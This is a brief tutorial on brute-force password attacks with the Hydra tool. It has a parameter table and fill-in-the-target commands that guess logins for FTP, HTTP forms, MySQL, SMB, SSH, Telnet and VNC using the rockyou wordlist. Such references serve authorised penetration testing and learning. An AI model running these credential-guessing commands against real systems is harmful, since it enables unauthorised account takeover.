What is brute-force
Known as brute force, it consists of an attempt to crack a password or a username, finding a web page to hide, or discovering a key used to encrypt a message, using a trial and error approach and hoping that, at some point, it will be possible to guess. This is an old attack method, but it is still popular and effective among hackers.
Hydra
For a better understanding it is necessary to know how the Hydra tool works, so here below I will leave a manual.
| Parameter | Description |
|---|---|
| -L | Set a wordlist for user testing. |
| -l | Define which user is to be tested. |
| -P | Set a wordlist for password testing. |
| -p | Define which password is to be tested. |
| -F | When you get a valid combination the test will be finished. |
| -s | Defines which port will be tested. |
| -t | Sets the number of tests per second (Hydra’s default is 16). |
| -v | Activate verbose mode, it shows everything being tested. |
| -V | Enables extended verbose mode, this way will show the tested username and password combination. |
Brute-force in services
FTP
hydra -l <user> -P /usr/share/wordlist/rockyou.txt <IP> ftpHTTP – Post Form
hydra -l <user> -P /usr/share/wordlist/rockyou.txt <site.com or IP> http-post-form "/caminho/login.php:name=^USER^&password=^PASS^&enter=Sign+in:error message"MySQL
hydra -l <usuario> -P /usr/share/wordlist/rockyou.txt <IP> mysqlSMB
hydra -l Administrator -P /usr/share/wordlist/rockyou.txt <IP> smb -t 1SSH
hydra -l root -P /usr/share/wordlist/rockyou.txt [-t 32] <IP> sshTelnet
hydra -l root -P /usr/share/wordlist/rockyou.txt [-t 32] <IP> telnetVNC
hydra -P /usr/share/wordlist/rockyou.txt -s <PORT> <IP> vnc